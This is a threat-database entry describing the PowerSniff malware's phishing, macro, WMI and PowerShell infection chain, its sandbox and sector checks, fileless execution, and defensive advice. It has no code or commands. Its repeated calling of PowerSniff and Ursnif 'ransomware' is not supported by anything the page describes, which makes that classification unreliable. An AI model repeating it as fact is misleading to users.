Threat Database Ransomware PowerSniff Ransomware

PowerSniff Ransomware

By GoldSparrow in Ransomware

Threat Scorecard

Threat Level: 80 % (High)
Infected Computers: 7
First Seen: April 6, 2016
Last Seen: February 27, 2023
OS(es) Affected: Windows

The PowerSniff Ransomware is a ransomware Trojan that abuses macros and the Windows Powershell to infect computers. The PowerSniff Ransomware is being used in attacks in the United States and Europe. Although the PowerSniff Ransomware is not being used against specific targets, the PowerSniff Ransomware infections have been targeted towards certain industries and sectors actively, while avoiding others.

The Distribution and Infection Methods Used by the PowerSniff Ransomware

The PowerSniff Ransomware takes advantage of Powershell and macro vulnerabilities on targeted computers, a method of attack that has increased in popularity in the last year. The PowerSniff Ransomware may be distributed using corrupted email attachments through spam emails. Thousands of email messages containing the PowerSniff Ransomware have been sent in the last few weeks. There are several reasons why the PowerSniff Ransomware corrupted email attachments have been particularly effective in reaching their targets:

  1. The PowerSniff Ransomware phishing email messages may contain specific information about the target that include the target's name, phone number and company data.
  2. The email attachment that may be used to distribute the PowerSniff Ransomware is a Microsoft Word document, a type of document that has not been associated recently with attacks (the attack exploits a vulnerability in macros that allows third parties to deliver corrupted code to the victims' computers when they authorize the use of macros on the harmful file>.
  3. The sheer volume of spam emails that are being sent out to deliver the PowerSniff Ransomware is staggering, with about 1,500 (only a fraction of the total number) detected in a single week by PC security analysts.

When the file containing the PowerSniff Ransomware is opened, the file calls on Windows Management Instrumentation (WMI), a Windows service that is used to create a hidden PowerShell instance. This automation tool, an important and useful part of Windows, is abused to deliver the PowerSniff Ransomware itself to the victim's computer. To carry out the attack, it may be necessary for the victim to authorize the use of macros in the Microsoft Office.

How the PowerSniff Ransomware Attacks a Computer

During the PowerSniff Ransomware attack, PowerShell downloads a script that decrypts and executes the payload after first confirming that it is not being run in a virtual system. There are several peculiarities about the PowerSniff Ransomware attack. Initially, the PowerSniff Ransomware will ensure that it is not operating on a computer belonging to an education or healthcare facility. To do this, the PowerSniff Ransomware searches for certain strings on the victim's computer. The PowerSniff Ransomware will check for strings that could mean that there is a Point of Sale software (PoS) and programs that are commonly used to carry out sales and other transactions. It seems that the PowerSniff Ransomware infections are targeted towards computers used in monetary transactions specifically, and avoid computers belonging to education or healthcare institutions actively.

The PowerSniff Ransomware does not Create a File on the Victim’s Computer

One of the characteristics of the PowerSniff Ransomware is that it does not require the creation of an executable file on the victim's computer to carry out its attack. The PowerSniff Ransomware belongs to Ursnif, a family of ransomware Trojans that are injected directly into the targeted computer's memory. Because there is no executable file to remove or analyze, the PowerSniff Ransomware becomes particularly difficult to detect or contains and presents a significant threat to computers. PC security researchers strongly advise the use of a reliable, fully updated security program and an anti-spam filter to intercept a the PowerSniff Ransomware attack. Computer users should disable macros on Microsoft Office and avoid opening macros in files that were received from unknown or questionable sources (particularly unsolicited email messages, whose attachments should never be opened).


Most Viewed